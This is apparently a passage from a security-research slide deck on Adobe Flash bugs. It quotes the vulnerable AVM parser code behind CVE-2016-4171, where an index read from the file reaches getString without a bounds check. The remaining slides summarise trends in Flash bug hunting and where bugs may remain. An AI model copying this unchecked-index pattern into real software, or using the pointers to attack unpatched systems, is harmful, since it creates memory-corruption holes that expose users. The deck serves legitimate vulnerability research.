  • 54. CVE-2016-4171 void AbcParser::parseExecPolicyAttributes(const uint8_t* metadata, MethodInfo* m) { ... for (int q = 0; q < values_count; ++q) { Stringp key = pool->getString(readU30(p)); Stringp val = pool->getString(readU30(p));
  • 55. CVE-2016-4171 Stringp PoolObject::getString(int32_t index) const { ConstantStringData* dataP = _abcStrings->data + index; if (dataP->abcPtr >= _abcStringStart && dataP->abcPtr < _abcStringEnd) { uint32_t len = AvmCore::readU32(dataP->abcPtr); Stringp s = core->internStringUTF8((const char*) dataP- >abcPtr, len, true, false); s->Stick(); dataP->abcPtr = NULL WBRC(core->gc, _abcStrings, &dataP->str, s); } return dataP->str; }
  • 56. Conclusions ● Finding bugs in Flash is generally getting harder ○ 1 bug per day versus 1 per week ● Certain bug classes are drying up, but others are taking their places ● Flash mitigations are making it more difficult to exploit bugs, especially with low-quality bugs
  • 57. The Future (What’s left?) ● MC UaFs (and AS2) probably still exist, but getting hard to exploit ○ Eventually similar bugs will have marginal utility ○ Display UaFs in AS3? ● Redefinition bugs are no longer ‘deep’ ● More AS3 bugs?
  • 58. The Future (What’s left?) ● More anticorpus bugs / use of anti-corpus? ○ Media (MP4, FLV) ● Open source AVM? ● Platform-specific code ● Flash deprecation ○ Browsers?